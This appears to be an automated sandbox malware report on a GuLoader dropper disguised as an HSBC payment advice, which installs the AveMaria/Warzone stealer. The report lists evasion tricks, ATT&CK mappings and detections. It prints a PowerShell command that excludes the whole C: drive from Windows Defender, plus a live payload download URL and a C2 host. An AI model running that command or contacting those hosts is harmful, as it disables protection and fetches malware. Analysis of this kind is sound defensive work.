              Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
              Source: images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
              Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
              Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
              Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
              Source: images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmpBinary or memory string: vmicvss
              Source: HSBC Payment Advice.exe, 0000000C.00000002.510641709.00000000033E0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://spuredge.com/warzone_JBBOxCEy72.bin
              Source: HSBC Payment Advice.exe, 0000000C.00000002.509564917.0000000001B1F000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
              Source: HSBC Payment Advice.exe, 00000000.00000002.378371625.00000000021D0000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510641709.00000000033E0000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653629492.0000000002260000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.775353631.0000000001AD0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
              Source: HSBC Payment Advice.exe, 0000000C.00000002.509564917.0000000001B1F000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWen-USnm
              Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
              Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
              Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
              Source: images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat
              Source: HSBC Payment Advice.exe, 00000000.00000002.378371625.00000000021D0000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653629492.0000000002260000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\mshtml.dll

              Anti Debugging:

              barindex
              Hides threads from debuggersShow sources
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeThread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeThread information set: HideFromDebugger
              Source: C:\ProgramData\images.exeThread information set: HideFromDebugger
              Source: C:\ProgramData\images.exeThread information set: HideFromDebugger
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\ProgramData\images.exeCode function: 28_2_017ABD0E mov eax, dword ptr fs:[00000030h]
              Source: C:\ProgramData\images.exeCode function: 28_2_017A8FAA mov eax, dword ptr fs:[00000030h]
              Source: C:\ProgramData\images.exeCode function: 28_2_017ADCC3 mov eax, dword ptr fs:[00000030h]
              Source: C:\ProgramData\images.exeCode function: 28_2_017AC8BB mov eax, dword ptr fs:[00000030h]
              Source: C:\ProgramData\images.exeCode function: 28_2_017AA3C5 LdrInitializeThunk,

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Adds a directory exclusion to Windows DefenderShow sources
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\Users\user\Desktop\HSBC Payment Advice.exe "C:\Users\user\Desktop\HSBC Payment Advice.exe"
              Source: C:\ProgramData\images.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
              Source: images.exe, 0000001C.00000002.775689055.0000000002030000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
              Source: images.exe, 0000001C.00000002.775689055.0000000002030000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
              Source: images.exe, 0000001C.00000002.775689055.0000000002030000.00000002.00020000.sdmpBinary or memory string: Progman
              Source: images.exe, 0000001C.00000002.775689055.0000000002030000.00000002.00020000.sdmpBinary or memory string: Progmanlock
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

              Lowering of HIPS / PFW / Operating System Security Settings:

              barindex
              Increases the number of concurrent connection per server for Internet ExplorerShow sources
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10Jump to behavior

              Stealing of Sensitive Information:

              barindex
              Yara detected Generic DropperShow sources
              Source: Yara matchFile source: Process Memory Space: HSBC Payment Advice.exe PID: 5816, type: MEMORYSTR
              Yara detected AveMaria stealerShow sources
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b2fab0.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              GuLoader behavior detectedShow sources
              Source: Initial fileSignature Results: GuLoader behavior
              Source: Yara matchFile source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: HSBC Payment Advice.exe PID: 5816, type: MEMORYSTR

              Remote Access Functionality:

              barindex
              Yara detected AveMaria stealerShow sources
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b2fab0.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection12Masquerading3Input Capture11Security Software Discovery41Remote ServicesInput Capture11Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationEndpoint Denial of Service1
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion221Security Account ManagerVirtualization/Sandbox Evasion221SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection12NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol213SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptHidden Files and Directories1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonHidden Users1Cached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 528768 Sample: HSBC Payment Advice.exe Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 31 spuredge.com 2->31 33 barr2.ddns.net 2->33 45 Multi AV Scanner detection for domain / URL 2->45 47 Potential malicious icon found 2->47 49 Found malware configuration 2->49 51 17 other signatures 2->51 9 HSBC Payment Advice.exe 2->9         started        signatures3 process4 signatures5 57 Tries to detect Any.run 9->57 59 Hides threads from debuggers 9->59 12 HSBC Payment Advice.exe 4 11 9->12         started        process6 dnsIp7 35 spuredge.com 38.103.244.107, 443, 49784, 49823 FHLB-OFUS United States 12->35 27 C:\ProgramData\images.exe, PE32 12->27 dropped 29 C:\ProgramData\images.exe:Zone.Identifier, ASCII 12->29 dropped 61 Adds a directory exclusion to Windows Defender 12->61 63 Tries to detect Any.run 12->63 65 Increases the number of concurrent connection per server for Internet Explorer 12->65 67 2 other signatures 12->67 17 images.exe 12->17         started        20 powershell.exe 25 12->20         started        file8 signatures9 process10 signatures11 37 Multi AV Scanner detection for dropped file 17->37 39 Machine Learning detection for dropped file 17->39 41 Tries to detect Any.run 17->41 43 Hides threads from debuggers 17->43 22 images.exe 17->22         started        25 conhost.exe 20->25         started        process12 signatures13 53 Tries to detect Any.run 22->53 55 Hides threads from debuggers 22->55

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              HSBC Payment Advice.exe56%VirustotalBrowse
              HSBC Payment Advice.exe20%MetadefenderBrowse
              HSBC Payment Advice.exe49%ReversingLabsWin32.Downloader.GuLoader
              HSBC Payment Advice.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\ProgramData\images.exe100%Joe Sandbox ML
              C:\ProgramData\images.exe56%VirustotalBrowse
              C:\ProgramData\images.exe20%MetadefenderBrowse
              C:\ProgramData\images.exe49%ReversingLabsWin32.Downloader.GuLoader

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              12.0.HSBC Payment Advice.exe.400000.1.unpack100%AviraTR/Dropper.VB.GenDownload File
              12.0.HSBC Payment Advice.exe.400000.3.unpack100%AviraTR/Dropper.VB.GenDownload File
              28.0.images.exe.400000.0.unpack100%AviraTR/Dropper.VB.GenDownload File
              12.0.HSBC Payment Advice.exe.400000.0.unpack100%AviraTR/Dropper.VB.GenDownload File
              28.0.images.exe.400000.1.unpack100%AviraTR/Dropper.VB.GenDownload File
              0.0.HSBC Payment Advice.exe.400000.0.unpack100%AviraTR/Dropper.VB.GenDownload File
              21.2.images.exe.400000.0.unpack100%AviraTR/Dropper.VB.GenDownload File
              21.0.images.exe.400000.0.unpack100%AviraTR/Dropper.VB.GenDownload File
              0.2.HSBC Payment Advice.exe.400000.0.unpack100%AviraTR/Dropper.VB.GenDownload File
              12.0.HSBC Payment Advice.exe.400000.2.unpack100%AviraTR/Dropper.VB.GenDownload File
              28.0.images.exe.400000.2.unpack100%AviraTR/Dropper.VB.GenDownload File
              28.0.images.exe.400000.3.unpack100%AviraTR/Dropper.VB.GenDownload File

              Domains

              SourceDetectionScannerLabelLink
              spuredge.com12%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              https://spuredge.com/warzone_JBBOxCEy72.bin0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              barr2.ddns.net
              194.5.97.4
              truetrue
                unknown
                spuredge.com
                38.103.244.107
                truetrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://spuredge.com/warzone_JBBOxCEy72.bintrue
                • Avira URL Cloud: safe
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://github.com/syohex/java-simple-mine-sweeperC:HSBC Payment Advice.exe, 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmpfalse
                  high

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  38.103.244.107
                  spuredge.comUnited States
                  40695FHLB-OFUStrue

                  General Information

                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:528768
                  Start date:25.11.2021
                  Start time:18:47:52
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 8m 33s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:HSBC Payment Advice.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:29
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.rans.phis.troj.spyw.expl.evad.winEXE@10/6@3/1
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 91.8% (good quality ratio 62.6%)
                  • Quality average: 41.9%
                  • Quality standard deviation: 35.3%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240s for sample files taking high CPU consumption
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                  • TCP Packets have been reduced to 100
                  • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200
                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, dual-a-0001.dc-msedge.net, client.wns.windows.com, fs.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  18:50:53API Interceptor28x Sleep call for process: powershell.exe modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  spuredge.comHSBC Customer Information.exeGet hashmaliciousBrowse
                  • 164.90.131.131
                  HSBC Customer Information.exeGet hashmaliciousBrowse
                  • 164.90.131.131
                  SecuriteInfo.com.W32.AIDetect.malware2.27504.exeGet hashmaliciousBrowse
                  • 164.90.131.131
                  BENEFICIARY PAYMENT NOTICE.exeGet hashmaliciousBrowse
                  • 164.90.131.131
                  Invoice-NBM01557.exeGet hashmaliciousBrowse
                  • 164.90.131.131
                  HSBC Customer Information.exeGet hashmaliciousBrowse
                  • 164.90.131.131
                  HSBC Payment Advice.exeGet hashmaliciousBrowse
                  • 164.90.131.131
                  Invoice-NBM01557.exeGet hashmaliciousBrowse
                  • 164.90.131.131

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  FHLB-OFUShusAc5LfPPGet hashmaliciousBrowse
                  • 38.103.146.9
                  mipsGet hashmaliciousBrowse
                  • 38.103.254.188

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  37f463bf4616ecd445d4a1937da06e19duLT5gkRjy.exeGet hashmaliciousBrowse
